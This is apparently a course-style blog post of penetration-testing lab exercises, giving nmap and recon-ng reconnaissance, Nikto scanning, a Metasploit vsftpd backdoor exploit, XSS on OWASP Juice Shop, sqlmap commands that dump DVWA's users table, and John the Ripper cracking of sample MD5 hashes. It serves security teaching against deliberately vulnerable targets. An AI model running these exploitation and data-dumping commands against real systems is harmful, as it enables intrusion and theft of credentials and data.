Practical Cybersecurity Penetration Testing Techniques

Posted on Aug 22, 2025 in Computers

Experiment 1: Network Reconnaissance and Footprinting

This experiment focuses on gathering information about target networks and systems, a crucial first step in any penetration test.

Deliverable: Network Inventory Report

A detailed report listing discovered IP addresses and active services.

Tools for Reconnaissance

  • Nmap (Network Mapper): An open-source tool used for network discovery, security auditing, and vulnerability scanning.
  • Recon-ng: A modular, open-source reconnaissance framework used to gather open-source intelligence (OSINT) for ethical hacking and penetration testing.

Execution Steps and Commands

Follow these commands to perform network reconnaissance:

$ nmap -sn 192.168.1.0/24
$ nmap -sS -sV -O 192.168.1.5
$ recon-ng
$ workspaces create TechSecure
$ marketplace install all
$ modules load recon/domains-hosts/hackertarget
$ set SOURCE google.com
$ run
$ modules load reporting/html
$ set CREATOR TechSecure
$ set CUSTOMER TechSecure
$ set FILENAME /kali/Desktop/TechSecure.html
$ run

Experiment 2: Vulnerability Scanning and Assessment

This experiment demonstrates how to identify security weaknesses in web servers and applications.

Deliverable: Vulnerability Assessment Report

A report detailing identified vulnerabilities, including CVE references and risk ratings.

Key Tool: Nikto Web Scanner

  • Nikto: An open-source web server scanner that detects vulnerabilities, outdated software, and security issues in web servers.

Execution Steps

Execute the following commands to scan for web server vulnerabilities:

$ nikto -h http://[IP ADDRESS OF METASPLOIT]/dvwa/index.php -o /kali/Desktop/nescan.txt
$ mousepad nescan.txt

After scanning, create a table with the following columns to document findings:

  • Vulnerability Description
  • CVE/Reference ID
  • Risk Rating

Experiment 3: Exploiting Known Vulnerabilities

This experiment focuses on actively exploiting identified vulnerabilities to demonstrate their impact.

Deliverable: Proof of Exploit Session and Impact Notes

A screenshot and log of a successful exploit session, along with notes on the potential impact of the vulnerability.

Tools for Vulnerability Exploitation

  • Metasploit Framework: An open-source penetration testing platform that enables security professionals to find, exploit, and validate vulnerabilities in systems.
  • Metasploitable 2: A deliberately vulnerable Linux virtual machine designed for testing and practicing penetration testing with tools like Metasploit.
  • Nmap (Network Mapper): A free, open-source tool used to discover hosts, services, and vulnerabilities on a computer network by sending packets and analyzing responses.

Execution Steps

Follow these steps to exploit a known vulnerability using Metasploit:

  1. Check the IP address of Metasploitable 2.
  2. Scan the target:
    $ nmap -sS -sV -O [IP address]/24
  3. Launch Metasploit console:
    $ msfconsole
  4. Search for the target exploit (e.g., VS FTPD):
    $ search vsftpd
  5. Select the exploit module:
    $ use exploit/unix/ftp/vsftpd_234_backdoor
  6. Set the remote host:
    $ set RHOST [IP address]
  7. Execute the exploit until a session is found:
    $ exploit

Experiment 5: Cross-Site Scripting (XSS) with Burp Suite and Juice Shop

This experiment aims to understand and demonstrate how a simple Cross-Site Scripting (XSS) attack works using Burp Suite and deliberately vulnerable web applications.

Key XSS Concepts

  • XSS: Cross-Site Scripting, a type of security vulnerability enabling attackers to inject client-side scripts into web pages viewed by other users.
  • Payload: The malicious script or code injected during an attack.
  • URL Encoding: The process of converting characters into a format that can be transmitted over the internet.
  • Burp Suite: An integrated platform for performing security testing of web applications.
  • Intercept: The ability of a proxy tool like Burp Suite to capture and modify HTTP requests and responses.

Tools for XSS Testing

  • OWASP Juice Shop
  • Burp Suite Community Edition

Execution Steps for XSS Demonstration

  1. Start the OWASP Juice Shop application.
  2. Open Burp Suite.
  3. Open the built-in Burp browser.
  4. Find a form within the Juice Shop application (e.g., customer feedback or search bar).
  5. Fill in the form with an XSS payload.
  6. Intercept the request in Burp Suite.
  7. View the result, observing the XSS payload execution.

What You Will Learn

  • What is Cross-Site Scripting (XSS) and its types (Stored, Reflected, DOM-based).
  • How to intercept and modify HTTP requests using Burp Suite Proxy.
  • Crafting malicious payloads to trigger XSS alerts.
  • Practical demonstration on OWASP Juice Shop’s Customer Feedback and Search functionalities.
  • Understanding XSS impact and basic mitigation techniques.

Tools Used:

  • Burp Suite Community Edition
  • OWASP Juice Shop (local instance)
  • Google Chrome (with proxy configured)

Experiment 4: SQL Injection Attacks on Web Applications

This experiment demonstrates how to perform SQL injection attacks to extract sensitive database information from web applications.

Deliverable: Extracted Database Entries and Risk Report

Proof of extracted database entries and a brief report on the risk posed to the organization by SQL injection vulnerabilities.

Tools and Concepts for SQL Injection

  • SQLMap: An open-source tool that automates detecting and exploiting SQL injection vulnerabilities in web applications.
  • SQL Injection: A web security vulnerability that allows attackers to interfere with a web application’s database queries.
  • DVWA (Damn Vulnerable Web Application): A deliberately insecure web application designed for learning and practicing web vulnerabilities like SQL injection.

Execution Steps for SQL Injection

Follow these steps to perform SQL injection using SQLMap on DVWA:

  1. Install SQLMap:
    $ sudo apt install sqlmap
  2. Log in to DVWA with the following credentials:
    • Username: admin
    • Password: password
  3. Go to the ‘DVWA Security’ section and set the security level to ‘Low’.
  4. Navigate to the ‘SQL Injection’ page and enter ‘1’ as the ID.
  5. Use browser developer tools (Inspect Element) to obtain the PHP session ID and security level cookie values.
  6. Execute SQLMap with the obtained cookie values:
    $ sqlmap -u "http://[IP ADDRESS]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[VALUE]; security=low"
  7. To enumerate databases, run:
    $ sqlmap -u "http://[IP ADDRESS]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[VALUE]; security=low" --dbs
  8. To display tables in a database (e.g., dvwa), run:
    $ sqlmap -u "http://[IP ADDRESS]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[VALUE]; security=low" -D dvwa --tables
  9. To view columns in a specific table (e.g., users), run:
    $ sqlmap -u "http://[IP ADDRESS]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[VALUE]; security=low" -D dvwa -T users --columns
  10. To dump all data from the ‘users’ table:
    $ sqlmap -u "http://[IP ADDRESS]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[VALUE]; security=low" -D dvwa -T users --dump

Experiment 6: Password Hash Cracking with John the Ripper

This experiment focuses on understanding password hashing and demonstrating how to crack password hashes using John the Ripper.

Deliverable: Cracked Passwords and Complexity Recommendations

A list of cracked passwords or confirmed account access, along with recommendations for password complexity and security.

Understanding Password Hashing and Cracking

  • Introduction to password hashing and cracking principles.
  • Installing and using John the Ripper on Kali Linux.
  • Cracking example password hashes.
  • Understanding various hash types (e.g., MD5, SHA1).
  • Importance of strong password policies in cybersecurity.

Tools for Password Cracking

  • Kali Linux
  • John the Ripper

Example Hash File Inputs

Create a file named hash.txt with the following content:

user1:5f4dcc3b5aa765d61d8327deb882cf99
admin:21232f297a57a5a743894a0e4a801fc3
test:098f6bcd4621d373cade4e832627b4f6
guest:81dc9bdb52d04dc20036dbd8313ed055
root:e99a18c428cb38d5f260853678922e03

Execution Commands

Use these commands to install John the Ripper and crack the hashes:

$ sudo apt install john
$ john --format=RAW-MD5 /home/student/Desktop/hash.txt

Experiment 9: Comprehensive Web Application Penetration Testing

This experiment simulates a full web application penetration test, covering various stages from reconnaissance to exploitation.

Penetration Test Deliverables

  • Reconnaissance and Information Gathering Report
  • Vulnerability Scanning Report
  • Proof of Exploiting Web Application Flaws (e.g., SQLi, XSS, Broken Authentication)
  • Documentation of Accessing Admin Panels and Sensitive Data
  • Final Reporting and Documentation

Tools for Web Application Penetration Testing

  • OWASP Juice Shop
  • Burp Suite
  • Nmap (optional)
  • Browser Developer Tools

Execution Steps for Full Web App Pentest

  1. Start the OWASP Juice Shop application.
  2. Perform Cross-Site Scripting (XSS) in the search bar.
  3. Execute SQL Injection in the login form.
  4. Demonstrate Broken Authentication using Burp Suite Intruder.
  5. Identify and exploit Insecure Direct Object Reference (IDOR) vulnerabilities.